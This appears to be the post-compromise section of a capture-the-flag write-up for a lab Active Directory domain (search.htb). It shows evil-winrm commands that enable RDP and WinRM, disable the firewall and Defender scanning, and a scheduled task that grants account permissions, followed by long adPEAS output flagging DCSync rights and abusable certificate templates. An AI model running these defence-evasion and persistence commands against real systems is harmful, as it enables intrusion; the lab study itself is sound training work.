Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target domain.
ps c:\> Enable-PSRemoting -Force
WinRM is already set up to receive requests on this computer.
WinRM has been updated for remote management.
WinRM firewall exception enabled.
ps c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
ps c:\> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
WinRM & RDP enabled
*evil-winrm* ps c:\Users\Tristan.Davies> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
*evil-winrm* ps c:\Users\Tristan.Davies> Set-MpPreference -DisableRealtimeMonitoring $true
*evil-winrm* ps c:\Users\Tristan.Davies> Set-MpPreference -DisableIOAVProtection $true
*evil-winrm* ps c:\Users\Tristan.Davies> Set-MpPreference -DisableScriptScanning 1
AV & FW disabled
Scheduled Tasks
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
Perms \ Ready
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> cmd /c schtasks /QUERY /TN \Perms /V /FO LIST
Folder: \
HostName: RESEARCH
TaskName: \Perms
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 31/01/2024 14:13:04
Last Result: 0
Author: SEARCH\Administrator
Task To Run: C:\Windows\Tasks\perms.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
C:\Windows\Tasks\perms.bat
*evil-winrm* ps c:\Users\Tristan.Davies\Documents> cat C:\Windows\Tasks\perms.bat
dsacls "cn=tristan davies,cn=users,dc=search,dc=htb" /g "s-1-5-21-271492789-1610487937-1871574529-1299:GA
Installed Programs
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/14/2020 11:24 AM HelpDesk
d----- 3/23/2020 7:20 AM inetpub
d----- 7/30/2020 3:43 PM PerfLogs
d-r--- 4/13/2022 12:21 PM Program Files
d----- 9/15/2018 8:21 AM Program Files (x86)
d----- 1/30/2024 5:31 PM RedirectedFolders
d-r--- 1/31/2024 10:46 AM Users
d----- 1/31/2024 10:26 AM Windows
-a---- 1/31/2024 10:25 AM 90 __1706696618.39789
-a---- 1/31/2024 10:26 AM 21 __output
*Evil-WinRM* PS C:\> ls "Program Files"
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/26/2020 10:24 AM common files
d----- 9/15/2018 8:12 AM internet explorer
d----- 7/31/2020 9:06 AM PackageManagement
d----- 4/13/2022 12:21 PM VMware
d----- 5/24/2021 9:42 AM Windows Defender
d----- 11/22/2021 8:17 PM Windows Defender Advanced Threat Protection
d----- 7/31/2020 9:06 AM WindowsPowerShell
*Evil-WinRM* PS C:\> ls "Program Files (x86)"
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 8:21 AM common files
d----- 9/15/2018 8:12 AM internet explorer
d----- 9/15/2018 8:12 AM Microsoft.NET
d----- 5/24/2021 9:42 AM Windows Defender
d----- 9/15/2018 8:12 AM WindowsPowerShell
*Evil-WinRM* PS C:\> ls "ProgramData"
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/13/2023 2:59 PM Corefig
d---s- 1/31/2024 10:48 AM Microsoft
d----- 4/13/2022 12:20 PM Package Cache
d----- 1/30/2024 9:07 AM regid.1991-06.com.microsoft
d----- 9/15/2018 8:12 AM SoftwareDistribution
d----- 3/23/2020 1:31 PM ssh
d----- 3/22/2020 11:51 PM USOPrivate
d----- 3/22/2020 11:51 PM USOShared
d----- 12/16/2021 5:08 PM VMware
Web
*evil-winrm* ps c:\inetpub> ls
directory: C:\inetpub
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2020 7:20 AM custerr
d----- 8/11/2020 9:45 AM history
d----- 4/7/2020 10:05 AM logs
d----- 4/7/2020 8:26 AM temp
d----- 4/9/2020 8:56 AM wwwroot
*evil-winrm* ps c:\inetpub> cd wwwroot
*evil-winrm* ps c:\inetpub\wwwroot> ls
directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/9/2020 8:55 AM css
d----- 4/9/2020 8:55 AM fonts
d----- 4/9/2020 8:55 AM images
d----- 4/9/2020 8:55 AM js
d----- 4/9/2020 8:55 AM scss
-a---- 8/11/2020 11:13 AM 44982 index.html
-a---- 9/24/2019 11:22 AM 931 main.html
-a---- 12/27/2019 8:20 AM 16521 prepros-6.config
-a---- 4/9/2020 8:55 AM 19559 single.html
Static
adPEAS
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> . .\adPEAS.ps1
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> Invoke-adPEAS
_ _____ ______ _____
| | __ \| ____| /\ / ____|
____ __| | |__) | |__ / \ | (___
/ _ |/ _ | ___/| __| / /\ \ \___ \
| (_| | (_| | | | |____ / ____ \ ____) |
\__,_|\__,_|_| |______/_/ \_\_____/
Version 0.8.13
Active Directory Enumeration
by @61106960
Legend
[?] Searching for juicy information
[!] Found a vulnerability which may can be exploited in some way
[+] Found some interesting information for further investigation
[*] Some kind of note
[#] Reserved
[?] +++++ Searching for Juicy Active Directory Information +++++
[?] +++++ Checking General Domain Information +++++
[+] Found general Active Directory domain information for domain 'search.htb':
Domain Name: search.htb
Domain SID: S-1-5-21-271492789-1610487937-1871574529
Domain Functional Level: Windows 2016
Forest Name: search.htb
Forest Children: No Subdomain[s] available
Domain Controller: Research.search.htb
[?] +++++ Checking Domain Policies +++++
[+] Found password policy of domain 'search.htb':
Minimum Password Age: 1 days
[!] Maximum Password Age: Disabled
[+] Minimum Password Length: 7 character
[!] Password Complexity: Disabled
[!] Lockout Account: Disabled
Reversible Encryption: Disabled
[+] Found Kerberos policy of domain 'search.htb':
Maximum Age of TGT: 10 hours
Maximum Age of TGS: 600 minutes
Maximum Clock Time Difference: 5 minutes
Krbtgt Password Last Set: 03/31/2020 15:19:36
[?] +++++ Checking Domain Controller, Sites and Subnets +++++
[+] Found domain controller of domain 'search.htb':
DC Host Name: Research.search.htb
DC Roles: SchemaRole,NamingRole,PdcRole,RidRole,InfrastructureRole
DC IP Address: fe80::a950:56b9:6c45:e1ce%6
Site Name: Default-First-Site-Name
[+] Found configured sites and IP subnets of domain 'search.htb':
Site IP Subnet: 172.22.20.0/23 (Site: Birmingham)
Site IP Subnet: 172.22.22.0/23 (Site: Glasgow)
Site IP Subnet: 172.22.24.0/23 (Site: London)
Site IP Subnet: 172.22.26.0/23 (Site: Manchester)
Site IP Subnet: 172.22.28.0/23 (Site: Newcastle)
Site IP Subnet: 172.22.30.0/23 (Site: Sheffield)
[?] +++++ Checking Forest and Domain Trusts +++++
[?] +++++ Checking Juicy Permissions +++++
[?] +++++ Checking Add-Computer Permissions +++++
[+] Filtering found identities that can add a computer object to domain '':
sAMAccountName: Domain Admins
distinguishedName: CN=Domain Admins,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-512
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Designated administrators of the domain
[+] admincount: This identity is or was member of a high privileged admin group
[+] The identity 'HelpDesk' is a non-default account and can add computer to the domain
sAMAccountName: HelpDesk
distinguishedName: CN=HelpDesk,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1294
[?] +++++ Checking DCSync Permissions +++++
[+] Filtering found identities that can perform DCSync in domain '':
[+] The identity 'Tristan.Davies' is a non-default account and can DCSync a domain controller
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[?] +++++ Checking LAPS Permissions +++++
[?] +++++ Searching for GPO local group membership Information +++++
[+] Found GPO 'Default Domain Policy' which adds member[s] to local group'Remote Desktop Users (built-in)'
GPO Name: Default Domain Policy
Local GroupName: Remote Desktop Users (built-in)
Local GroupSID: S-1-5-32-555
GroupMembers: SEARCH\Domain Users
[?] +++++ Searching for Active Directory Certificate Services Information +++++
[+] Found at least one available Active Directory Certificate Service
adPEAS does basic enumeration only, consider reading https://posts.specterops.io/certified-pre-owned-d95910965cd2
[+] Found Active Directory Certificate Services 'search-RESEARCH-CA':
CA Name: search-RESEARCH-CA
CA dnshostname: Research.search.htb
CA IP Address: 10.10.11.129
Date of Creation: 04/07/2020 07:29:30
DistinguishedName: CN=search-RESEARCH-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
NTAuthCertificates: True
Available Templates: ITSecOps
WebServers
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
[?] +++++ Searching for Vulnerable Certificate Templates +++++
adPEAS does basic enumeration only, consider using https://github.com/GhostPack/Certify or https://github.com/ly4k/Certipy
[?] +++++ Checking Template 'ITSecOps' +++++
[+] Identity 'SEARCH\ITSec' has enrollment rights for template 'ITSecOps'
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'ITSecOps'
Template Name: ITSecOps
Template distinguishedname: CN=ITSecOps,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 12:45:26
[+] Extended Key Usage: Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: SEARCH\ITSec
SEARCH\Domain Users
[?] +++++ Checking Template 'WebServers' +++++
[!] Template 'WebServers' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: WebServers
Template distinguishedname: CN=WebServers,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 10:07:27
Extended Key Usage: Server Authentication
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'DirectoryEmailReplication' +++++
[?] +++++ Checking Template 'DomainControllerAuthentication' +++++
[?] +++++ Checking Template 'KerberosAuthentication' +++++
[?] +++++ Checking Template 'EFSRecovery' +++++
[?] +++++ Checking Template 'EFS' +++++
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'EFS'
Template Name: EFS
Template distinguishedname: CN=EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
Extended Key Usage: Encrypting File System
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: SEARCH\Domain Users
[?] +++++ Checking Template 'DomainController' +++++
[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: WebServer
Template distinguishedname: CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
Extended Key Usage: Server Authentication
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'SEARCH\Domain Computers' has enrollment rights for template 'Machine'
Template Name: Machine
Template distinguishedname: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
[+] Extended Key Usage: Client Authentication, Server Authentication
EnrollmentFlag: AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for: SEARCH\Domain Computers
[?] +++++ Checking Template 'User' +++++
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'User'
Template Name: User
Template distinguishedname: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
[+] Extended Key Usage: Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: SEARCH\Domain Users
[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: SubCA
Template distinguishedname: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'Administrator' +++++
[?] +++++ Searching for Credentials Exposure +++++
[?] +++++ Searching for ASREProastable User +++++
[?] +++++ Searching for Kerberoastable User +++++
Warning: [Get-DomainSPNTicket] Error requesting ticket for SPN 'RESEARCH/web_svc.search.htb:60001' from user 'CN=Web Service,OU=Users,OU=Sheffield,OU=Sites,DC=search,DC=htb' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details."
[?] +++++ Searching for User with 'Linux/Unix Password' attribute +++++
[?] +++++ Searching for Computer with enabled and readable LAPS attribute +++++
[?] +++++ Searching for Group Managed Service Account (gMSA) +++++
[+] Found group Managed Service Account 'BIR-ADFS-GMSA$':
sAMAccountName: BIR-ADFS-GMSA$
distinguishedName: CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1299
[+] description: ADFS on Covid
[+] AllowedToRetrieveManagedPassword: Sheffield-ITSec
Rene.Larson
Glasgow-ITSec
Abby.Gonzalez
Manchester-ITSec
Camren.Luna
Birmingham-ITSec
Sierra.Frye
London-ITSec
Keely.Lyons
pwdLastSet: 04/09/2020 10:05:04
lastLogonTimestamp: 01/31/2024 01:10:28
userAccountControl: WORKSTATION_TRUST_ACCOUNT
[?] +++++ Searching for Credentials in SYSVOL Group Policy Files +++++
[?] +++++ Searching for Sensitive Information in NETLOGON Share +++++
[?] +++++ Searching for Delegation Issues +++++
[?] +++++ Searching for Computer with Unconstrained Delegation Rights +++++
[?] +++++ Searching for Computer with Constrained Delegation Rights +++++
[?] +++++ Searching for Computer with Resource-Based Constrained Delegation Rights +++++
[?] +++++ Searching for User with Constrained Delegation Rights +++++
[?] +++++ Searching for User with Resource-Based Constrained Delegation Rights +++++
[?] +++++ Starting Account Enumeration +++++
[?] +++++ Searching for Azure AD Connect +++++
[?] +++++ Searching for Users in High Privileged Groups +++++
[+] Found members in group 'BUILTIN\Administrators':
GroupName: Enterprise Admins
distinguishedName: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-519
[+] description: Designated administrators of the enterprise
GroupName: Domain Admins
distinguishedName: CN=Domain Admins,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-512
[+] description: Designated administrators of the domain
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SEARCH\Domain Admins':
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SEARCH\Enterprise Admins':
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SEARCH\Group Policy Creator Owners':
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'BUILTIN\Access Control Assistance Operators':
GroupName: London-ITSec
distinguishedName: CN=London-ITSec,OU=Groups,OU=London,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1105
GroupName: Manchester-ITSec
distinguishedName: CN=Manchester-ITSec,OU=Groups,OU=Manchester,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1107
GroupName: Sheffield-ITSec
distinguishedName: CN=Sheffield-ITSec,OU=Groups,OU=Sheffield,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1110
GroupName: Birmingham-ITSec
distinguishedName: CN=Birmingham-ITSec,OU=Groups,OU=Birmingham,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1106
GroupName: Glasgow-ITSec
distinguishedName: CN=Glasgow-ITSec,OU=Glasgow,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1108
GroupName: ITSec
distinguishedName: CN=ITSec,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1295
[+] Found members in group 'SEARCH\Cert Publishers':
sAMAccountName: RESEARCH$
distinguishedName: CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem: Windows Server 2019 Standard
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet: 01/30/2024 09:08:03
lastLogonTimestamp: 01/30/2024 09:08:33
[+] userAccountControl: SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
[?] +++++ Searching for High Privileged Users with a password older 5 years +++++
[?] +++++ Searching for High Privileged User which may not require a Password +++++
[?] +++++ Starting Computer Enumeration +++++
[?] +++++ Searching for Domain Controllers +++++
[+] Found Domain Controller 'RESEARCH$':
sAMAccountName: RESEARCH$
distinguishedName: CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem: Windows Server 2019 Standard
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet: 01/30/2024 09:08:03
lastLogonTimestamp: 01/30/2024 09:08:33
[+] userAccountControl: SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
[?] +++++ Searching for Exchange Servers +++++
[?] +++++ Searching for ADCS Servers +++++
[+] Found ADCS Server 'RESEARCH$':
sAMAccountName: RESEARCH$
distinguishedName: CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem: Windows Server 2019 Standard
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet: 01/30/2024 09:08:03
lastLogonTimestamp: 01/30/2024 09:08:33
[+] userAccountControl: SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION